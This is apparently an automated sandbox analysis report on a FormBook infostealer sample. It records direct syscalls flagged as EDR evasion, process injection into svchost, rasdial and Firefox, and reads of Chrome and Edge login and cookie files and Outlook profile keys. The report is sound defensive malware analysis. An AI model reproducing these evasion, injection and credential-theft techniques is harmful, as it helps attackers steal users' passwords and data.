Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]	2_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]	2_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]	2_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]	2_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]	2_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]	2_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]	2_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]	2_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]	2_2_0346A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]	2_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]	2_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0345E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_034FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0346C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0346C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430887 mov eax, dword ptr fs:[00000030h]	2_2_03430887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC89D mov eax, dword ptr fs:[00000030h]	2_2_034BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_001880A9

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0015A124 SetUnhandledExceptionFilter,		0_2_0015A124
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0015A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0015A155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\rasdial.exe

Thread register set: target process: 3668

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\rasdial.exe

Thread APC queued: target process: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\rPO-20429124.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B40008

Jump to behavior

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001887B1 LogonUserW,

0_2_001887B1

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00133B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00133B3A

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_001348D7

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00194C27 mouse_event,

0_2_00194C27

Source: C:\Users\user\Desktop\rPO-20429124.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPO-20429124.exe"	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00187CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00187CAF

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_0018874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0018874B

Source: rPO-20429124.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ciwawa29wTdWR69xAi924.exe, 00000003.00000000.2094053062.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000002.4528742660.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529110696.00000000017A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: rPO-20429124.exe, ciwawa29wTdWR69xAi924.exe, 00000003.00000000.2094053062.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000002.4528742660.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529110696.00000000017A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ciwawa29wTdWR69xAi924.exe, 00000003.00000000.2094053062.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000002.4528742660.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529110696.00000000017A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ciwawa29wTdWR69xAi924.exe, 00000003.00000000.2094053062.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000002.4528742660.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529110696.00000000017A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_0015862B cpuid

0_2_0015862B

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00164E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00164E87

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00171E06 GetUserNameW,

0_2_00171E06

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00163F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00163F3A

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001349A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4529137724.0000000000F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2175914455.00000000080D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4529171574.0000000000F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4531314792.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4527985230.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2171988415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4529216494.0000000003A10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2172584139.00000000041E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rasdial.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

